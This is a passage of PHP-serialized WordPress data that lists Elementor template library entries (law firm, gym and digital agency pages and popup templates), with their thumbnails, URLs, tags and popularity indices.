About\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2019/11/about.png\";s:12:\"tmpl_created\";i:1572847069;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/law-firm-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:73;s:16:\"popularity_index\";i:375;s:11:\"trend_index\";i:284;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:575;a:14:{s:2:\"id\";i:12091;s:5:\"title\";s:21:\"Law Firm &#8211; Team\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2019/11/team.png\";s:12:\"tmpl_created\";i:1572847113;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/law-firm-team/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:74;s:16:\"popularity_index\";i:354;s:11:\"trend_index\";i:241;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:576;a:14:{s:2:\"id\";i:10508;s:5:\"title\";s:25:\"Full Screen | Welcome Mat\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/01/hand_small-1.png\";s:12:\"tmpl_created\";i:1547964711;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/popups/full-screen-welcome-mat-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:75;s:16:\"popularity_index\";i:647;s:11:\"trend_index\";i:659;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:577;a:14:{s:2:\"id\";i:11129;s:5:\"title\";s:28:\"Digital Agency &#8211; About\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/07/About_small.png\";s:12:\"tmpl_created\";i:1564641889;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/digital-agency-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:30:\"[\"Digital Agency\",\"marketing\"]\";s:10:\"menu_order\";i:75;s:16:\"popularity_index\";i:193;s:11:\"trend_index\";i:112;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:578;a:14:{s:2:\"id\";i:11572;s:5:\"title\";s:19:\"Gym &#8211; Trainer\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2019/08/Trainer_Small.png\";s:12:\"tmpl_created\";i:1567392934;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:101:\"https://library.elementor.com/gym-trainer/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:7:\"[\"Gym\"]\";s:10:\"menu_order\";i:76;s:16:\"popularity_index\";i:534;s:11:\"trend_index\";i:589;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:579;a:14:{s:2:\"id\";i:9934;s:5:\"title\";s:38:\"Full Screen | Welcome Mat | Teddy Bear\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2019/01/full_mat_teddy_small.png\";s:12:\"tmpl_created\";i:1547841787;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/popups/full-screen-welcome-mat/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:76;s:16:\"popularity_index\";i:617;s:11:\"trend_index\";i:665;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:580;a:14:{s:2:\"id\";i:1504;s:5:\"title\";s:33:\"Landing Page &#8211; Mobile App 3\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-app2.png\";s:12:\"tmpl_created\";i:1494352112;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/landing-page-mobile-app-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:77;s:16:\"popularity_index\";i:163;s:11:\"trend_index\";i:253;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:581;a:14:{s:2:\"id\";i:12133;s:5:\"title\";s:24:\"Law Firm &#8211; Careers\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2019/11/careers.png\";s:12:\"tmpl_created\";i:1572847078;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/law-firm-careers/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:78;s:16:\"popularity_index\";i:558;s:11:\"trend_index\";i:545;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:582;a:14:{s:2:\"id\";i:9709;s:5:\"title\";s:25:\"Full Screen | Welcome Mat\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2019/01/Full-Screen_Welcome-Mat_01_small-1.png\";s:12:\"tmpl_created\";i:1547023834;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/popups/full-screen-welcome-mat-01/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:78;s:16:\"popularity_index\";i:667;s:11:\"trend_index\";i:634;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:583;a:14:{s:2:\"id\";i:12155;s:5:\"title\";s:26:\"Law Firm &#8211; Home Page\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2019/11/home.png\";s:12:\"tmpl_created\";i:1572847054;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/law-firm-home-page/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:79;s:16:\"popularity_index\";i:218;s:11:\"trend_index\";i:245;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:584;a:14:{s:2:\"id\";i:9671;s:5:\"title\";s:34:\"Hello Bar | Announcement | Cookies\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2019/01/Top-Bar_Announcement_small_01.png\";s:12:\"tmpl_created\";i:1547010259;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/popups/hello-bar-announcement-01/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:79;s:16:\"popularity_index\";i:588;s:11:\"trend_index\";i:633;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:585;a:14:{s:2:\"id\";i:10234;s:5:\"title\";s:38:\"Hello Bar | Announcement | Maintenance\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2019/01/pink_small.png\";s:12:\"tmpl_created\";i:1548055049;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/popups/hello-bar-announcement/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:80;s:16:\"popularity_index\";i:693;s:11:\"trend_index\";i:697;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:586;a:14:{s:2:\"id\";i:12080;s:5:\"title\";s:24:\"Law Firm &#8211; Partner\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/11/partner-1.png\";s:12:\"tmpl_created\";i:1572847120;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/law-firm-partner/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:80;s:16:\"popularity_index\";i:541;s:11:\"trend_index\";i:478;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:587;a:14:{s:2:\"id\";i:11074;s:5:\"title\";s:31:\"Digital Agency &#8211; Services\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2019/07/Services_small.png\";s:12:\"tmpl_created\";i:1564641872;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/digital-agency-services/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:30:\"[\"Digital Agency\",\"marketing\"]\";s:10:\"menu_order\";i:81;s:16:\"popularity_index\";i:169;s:11:\"trend_index\";i:108;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:588;a:14:{s:2:\"id\";i:11506;s:5:\"title\";s:19:\"Gym &#8211; Classes\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2019/08/Classes_Small.png\";s:12:\"tmpl_created\";i:1567392930;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:101:\"https://library.elementor.com/gym-classes/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:7:\"[\"Gym\"]\";s:10:\"menu_order\";i:82;s:16:\"popularity_index\";i:516;s:11:\"trend_index\";i:538;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:589;a:14:{s:2:\"id\";i:1503;s:5:\"title\";s:33:\"Landing Page &#8211; Mobile App 2\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-app1.png\";s:12:\"tmpl_created\";i:1494352113;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/landing-page-mobile-app-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:83;s:16:\"popularity_index\";i:162;s:11:\"trend_index\";i:187;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:590;a:14:{s:2:\"id\";i:9869;s:5:\"title\";s:28:\"Hello Bar | Promotion | Sale\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2019/01/ru_small.png\";s:12:\"tmpl_created\";i:1547837269;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/popups/hello-bar-promotion/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:83;s:16:\"popularity_index\";i:706;s:11:\"trend_index\";i:707;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:591;a:14:{s:2:\"id\";i:10539;s:5:\"title\";s:19:\"Hello Bar | Contact\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2019/01/hello_pink_small.png\";s:12:\"tmpl_created\";i:1548056994;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/popups/hello-bar-register-subscribe-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:84;s:16:\"popularity_index\";i:664;s:11:\"trend_index\";i:0;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:592;a:14:{s:2:\"id\";i:12044;s:5:\"title\";s:24:\"Law Firm &#8211; Contact\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2019/11/contsct_us.png\";s:12:\"tmpl_created\";i:1572847130;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/law-firm-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:84;s:16:\"popularity_index\";i:441;s:11:\"trend_index\";i:400;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:593;a:14:{s:2:\"id\";i:12124;s:5:\"title\";s:25:\"Law Firm &#8211; Services\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2019/11/services.png\";s:12:\"tmpl_created\";i:1572847096;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/law-firm-services/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:85;s:16:\"popularity_index\";i:422;s:11:\"trend_index\";i:316;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:594;a:14:{s:2:\"id\";i:11056;s:5:\"title\";s:35:\"Digital Agency &#8211; Social Media\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2019/07/Social-Media_small.png\";s:12:\"tmpl_created\";i:1564641867;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/digital-agency-social-media/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:30:\"[\"Digital Agency\",\"marketing\"]\";s:10:\"menu_order\";i:86;s:16:\"popularity_index\";i:295;s:11:\"trend_index\";i:184;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:595;a:14:{s:2:\"id\";i:11536;s:5:\"title\";s:19:\"Gym &#8211; Fitness\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2019/08/Fitness_Small.png\";s:12:\"tmpl_created\";i:1567392927;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:101:\"https://library.elementor.com/gym-fitness/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:7:\"[\"Gym\"]\";s:10:\"menu_order\";i:87;s:16:\"popularity_index\";i:582;s:11:\"trend_index\";i:596;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:596;a:14:{s:2:\"id\";i:11545;s:5:\"title\";s:21:\"Gym &#8211; Home Page\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2019/08/Home_Small.png\";s:12:\"tmpl_created\";i:1567392943;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/gym-home-page/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:7:\"[\"Gym\"]\";s:10:\"menu_order\";i:88;s:16:\"popularity_index\";i:317;s:11:\"trend_index\";i:345;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:597;a:14:{s:2:\"id\";i:10147;s:5:\"title\";s:34:\"Hello Bar | Sale | Promotion | Pop\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/01/donut_small.png\";s:12:\"tmpl_created\";i:1548055522;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/popups/hello-bar-sale-promotion/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:89;s:16:\"popularity_index\";i:710;s:11:\"trend_index\";i:700;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:598;a:14:{s:2:\"id\";i:12116;s:5:\"title\";s:24:\"Law Firm &#8211; Service\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2019/11/family_law.png\";s:12:\"tmpl_created\";i:1572847105;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/law-firm-service/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:89;s:16:\"popularity_index\";i:474;s:11:\"trend_index\";i:406;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:599;a:14:{s:2:\"id\";i:11094;s:5:\"title\";s:30:\"Digital Agency &#8211; Clients\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2019/07/Clients_small.png\";s:12:\"tmpl_created\";i:1564641885;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/digital-agency-clients/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:30:\"[\"Digital Agency\",\"marketing\"]\";s:10:\"menu_order\";i:90;s:16:\"popularity_index\";i:404;s:11:\"trend_index\";i:365;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:600;a:14:{s:2:\"id\";i:9923;s:5:\"title\";s:23:\"Slide In | Announcement\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2019/01/slide-in_ann_italian_small.png\";s:12:\"tmpl_created\";i:1547841537;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/popups/slide-in-announcement/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:90;s:16:\"popularity_index\";i:634;s:11:\"trend_index\";i:611;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:601;a:14:{s:2:\"id\";i:10117;s:5:\"title\";s:23:\"Slide In | Announcement\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/01/white_small.png\";s:12:\"tmpl_created\";i:1548066998;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/popups/slide-in-announcement-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:91;s:16:\"popularity_index\";i:668;s:11:\"trend_index\";i:0;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:602;a:14:{s:2:\"id\";i:11478;s:5:\"title\";s:17:\"Gym &#8211; About\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/08/About_Small.png\";s:12:\"tmpl_created\";i:1567392939;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:99:\"https://library.elementor.com/gym-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:7:\"[\"Gym\"]\";s:10:\"menu_order\";i:91;s:16:\"popularity_index\";i:462;s:11:\"trend_index\";i:391;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:603;a:14:{s:2:\"id\";i:11563;s:5:\"title\";s:19:\"Gym &#8211; Pricing\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2019/08/Pricing_Small.png\";s:12:\"tmpl_created\";i:1567392923;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:101:\"https://library.elementor.com/gym-pricing/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:7:\"[\"Gym\"]\";s:10:\"menu_order\";i:92;s:16:\"popularity_index\";i:542;s:11:\"trend_index\";i:561;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:604;a:14:{s:2:\"id\";i:9826;s:5:\"title\";s:33:\"Slide In | Announcement | webinar\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/01/web_small-2.png\";s:12:\"tmpl_created\";i:1547835513;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/popups/slide-in-announcement-webinar/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:92;s:16:\"popularity_index\";i:682;s:11:\"trend_index\";i:711;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:605;a:14:{s:2:\"id\";i:10478;s:5:\"title\";s:18:\"Slide In | Contact\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2019/01/slide_wow_small.png\";s:12:\"tmpl_created\";i:1548056829;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/popups/slide-in-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:93;s:16:\"popularity_index\";i:552;s:11:\"trend_index\";i:508;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:606;a:14:{s:2:\"id\";i:11034;s:5:\"title\";s:30:\"Digital Agency &#8211; Contact\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2019/07/Contsct-Us_small.png\";s:12:\"tmpl_created\";i:1564641881;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/contact-digital-agency/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:30:\"[\"Digital Agency\",\"marketing\"]\";s:10:\"menu_order\";i:93;s:16:\"popularity_index\";i:198;s:11:\"trend_index\";i:123;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:607;a:14:{s:2:\"id\";i:11528;s:5:\"title\";s:19:\"Gym &#8211; Contact\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2019/08/Contact_Small.png\";s:12:\"tmpl_created\";i:1567392917;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:101:\"https://library.elementor.com/gym-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:7:\"[\"Gym\"]\";s:10:\"menu_order\";i:94;s:16:\"popularity_index\";i:493;s:11:\"trend_index\";i:424;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:608;a:14:{s:2:\"id\";i:519;s:5:\"title\";s:24:\"Homepage &#8211; Fitness\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/10/0023.png\";s:12:\"tmpl_created\";i:1477388808;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/homepage-fitness/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:45:\"[\"Fitness\",\"Gym\",\"Health\",\"Homepage\",\"Sport\"]\";s:10:\"menu_order\";i:95;s:16:\"popularity_index\";i:10;s:11:\"trend_index\";i:32;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:609;a:14:{s:2:\"id\";i:487;s:5:\"title\";s:29:\"Landing Page &#8211; Vacation\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/10/0021.png\";s:12:\"tmpl_created\";i:1477388357;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/landing-page-vacation/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:96;s:16:\"popularity_index\";i:25;s:11:\"trend_index\";i:76;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:610;a:14:{s:2:\"id\";i:10685;s:5:\"title\";s:32:\"Hello Bar | Register | Subscribe\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/01/env_small.png\";s:12:\"tmpl_created\";i:1547974729;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/popups/hello-bar-register-subscribe-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:96;s:16:\"popularity_index\";i:651;s:11:\"trend_index\";i:690;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:611;a:14:{s:2:\"id\";i:855;s:5:\"title\";s:37:\"Landing Page &#8211; Personal Trainer\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2017/02/Landing-Page-Personal-Trainer.png\";s:12:\"tmpl_created\";i:1494352061;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/landing-page-personal-trainer/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:97;s:16:\"popularity_index\";i:264;s:11:\"trend_index\";i:373;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:612;a:14:{s:2:\"id\";i:955;s:5:\"title\";s:31:\"Landing Page &#8211; Law Office\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2017/02/Landing-Page-Law-Office.png\";s:12:\"tmpl_created\";i:1494352069;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/landing-page-law-office/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:31:\"[\"Landing Page\",\"Law\",\"Office\"]\";s:10:\"menu_order\";i:98;s:16:\"popularity_index\";i:175;s:11:\"trend_index\";i:331;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:613;a:14:{s:2:\"id\";i:9985;s:5:\"title\";s:20:\"Slide In | 